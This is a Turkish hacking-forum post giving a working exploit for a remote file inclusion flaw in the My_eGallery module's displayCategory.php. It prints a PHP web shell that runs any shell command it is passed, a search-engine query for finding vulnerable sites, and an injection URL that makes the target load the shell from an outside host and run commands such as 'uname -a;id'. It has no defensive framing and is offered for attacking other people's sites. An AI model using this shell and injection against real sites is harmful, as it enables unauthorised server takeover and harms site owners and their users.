My_eGallery Güvenlik Açığı[Anlatım]

OuTLaWsys

Banned
Katılım
24 Haz 2005
Mesajlar
70
Reaction score
0
Puanları
0
##############################################
My_eGallery Güvenlik Exploiti
##############################################

Bugs Dosyası : displayCategory.php

Örnek : http://www.target.com/modules/My_eGallery/public/displayCategory.php


Not: Atak yapmadan önce aşağıdaki scripti kaydedip kendi websitenize upload edin



---------------- script -----------------------------------------------------


<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>


------------------ Script Sonu ---------------------------------------------------------

1-)Arama motorlarına gidip şu şekillerde arama yaptırıyoruz-----> "allinurl:displayCategory.php" veya "My_eGallery"

2-)Kendimize şuna benzer bir hedef belirliyoruz.
http://www.target.com/modules/My_eGallery/public/displayCategory.php
3-)Bu komutu ekleyip test ediyoruz(burdaki site örnektir siz scripti upload ettiğiniz yeri gösterin)
?basepath=http://xxx.net/cmd.txt?&cmd=uname -a;id;
Yani

http://www.target.com/modules/My_eG...hp?basepath=http://xxx.net/cmd.txt?&cmd=uname -a;id;


4-)Artık linux komutlarını çalıştırabiliriz : ls -al , uname -r , cat , echo , etc....
 
Geri
Üst